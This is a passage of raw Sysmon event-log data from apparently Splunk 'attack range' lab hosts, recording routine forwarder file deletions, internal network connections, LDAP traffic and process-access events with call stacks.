Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BA79E719D980CECE473C28FAD90F627,SHA256=BEAD108058F0F26BCD26379E939ED4ABDD429CC8F04617C15F44A17BEDE9836D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:32.620{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56377-false10.0.1.12-8000- 23542300x800000000000000044281Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:36.892{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4064EC2C2D7183F1D3443DC41A80420D,SHA256=3BDD59FDCF903036DCD834FB90EDC7E11BE25910A0B1ED43397E8CF6A938E690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044284Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:37.983{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74632EAE3BDF3DBAAB820B934C143A6D,SHA256=B2F2836501EC15ECFAA3F20CE2CBFAD8A574B7DBC35F59B2C26B8ADA849A1D19,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044283Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:35.781{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52350-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:37.058{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1418DBA3BD5BEE4D5BC8BF4DA4087D7F,SHA256=F6989CFB40F41D77F5C68D05C1F5CA21EE7D3BACDB898E19940C60B52C23AC14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044282Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:37.708{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-219MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:38.157{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A297B3079A895986501AD271A466FE5,SHA256=A9181BAFAB62B7ED20149A2EA50223EC711DAED576BA41A62CF486B4D9F7B325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044285Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:38.719{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-220MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:37.850{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56378-false10.0.1.12-8000- 23542300x8000000000000000205419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:39.208{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E6ECA1B1456AE274F2C8DD5B9553863,SHA256=71F10B98A8F28C031B40A6D9B0CFB61F3F98C7C863955023CF0A93B7521F2CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044286Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:39.075{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93B825C16CC5A942AD409E891F67FD31,SHA256=D007DBB78D50ED182DB59729C9D47B6213AEA645AF22A9AEE83B2D414128F8B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:40.257{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C693A27B9B99542ADCFA29F6EA4CCA36,SHA256=C911A9FC924628672D11A4C7AE9E27B09789D9E6FA479D5F34048168AFFD0E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044287Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:40.170{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6BA7D9FEF1BD767C1FF3E709638628F,SHA256=B69D9517FB806BE973E01C3E813E8CB37430337916C8865749D5B588F78FCAD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044288Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:41.263{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC875B2FB7C7DB73818604004CA2E4D,SHA256=EFB1232007D4AB34389BAFAC05F9F33ADFBDA97D5B13CC478BFFCEBA64BFB073,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:41.391{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=094D810FB882BF38EE869EBCD766CD8B,SHA256=CCA16C8029D98390103890A575AC4C1D2A015998C799DA93D9720A3BA73B329F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044289Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:42.357{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D8EA726E0B9CC00779F8E6392D8FCB,SHA256=45D0B3AFB737B828E93BC5A71AAE0226D92CC9B0D6EDB8015819068AD5696747,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:40.748{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56379-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:40.748{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56379-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000205424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:42.437{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2D311B70623D5D633BB006B8BE39038,SHA256=9901A3EBF43E8263EEF039A0832B7886A6811F9378D9B5AE07380C231993DF01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:42.237{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FCAE76ECC59819AA1FF066D0069587C,SHA256=B7EC87E9E9F75EC5211DC5A5301708DD7417A52C6A2EABE51233016D9B9DCA94,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044291Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:41.681{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044290Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:43.451{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4B30AF6A45CD4F47260155FD06723F3,SHA256=0BE31DAADD78C302A9A7243D79FE182CCBD02CE75E403062DB87533C2812E57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:43.489{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E6D886B358A4A3CCD9E19F9D75B431B,SHA256=81030B49329140AD08C5285FED06F623919E66E121D1FE0EFDD3916B4C3EA3A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:43.289{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044292Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:44.545{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6771ECAA2155391E79222E9DC40025A4,SHA256=87C43E171DF331F5E7F95440543DE7E8ACA56E2FD2A9F9253045EB3F194748F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:42.899{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56380-false10.0.1.12-8089- 23542300x8000000000000000205429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:44.619{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A516082043590CED43F191183489AF,SHA256=BAD85AAE55427B090C6C069BDB51EA8DA7C1DF55712B06FC39C6ED633BB939F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044293Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:45.638{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC7EEED34643E6A468D06A1CD4A155C3,SHA256=2B09C88B425E014F40425A05196FD0183B942640F88BE7E6E120016FCEA63AB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:45.721{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B06F0E6AB874236E33E66BAF901DD90,SHA256=8B3EBDE58EA18A88A6E7D46C2CC7C3AE3C3EC3BAED10ABE4E70D3373C6724B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044294Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:46.732{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48DAB6F6131FAB871C9F4CB41C655E3B,SHA256=87783CB4C5927EB0761C4AD50227D18D7F1257780F047210EBC9EAB53406DB74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:46.837{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCA5106353E51443D1ED79BCE566E6FF,SHA256=611AE3F0F3ED84FAEDD3BA52742457F1FD5386CF2BE2D055CC190804C81ACC1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:43.813{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56381-false10.0.1.12-8000- 10341000x800000000000000044308Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1847-629A-1B07-000000006002}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044307Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044306Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044305Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044304Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044303Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044302Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044301Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044300Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044299Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl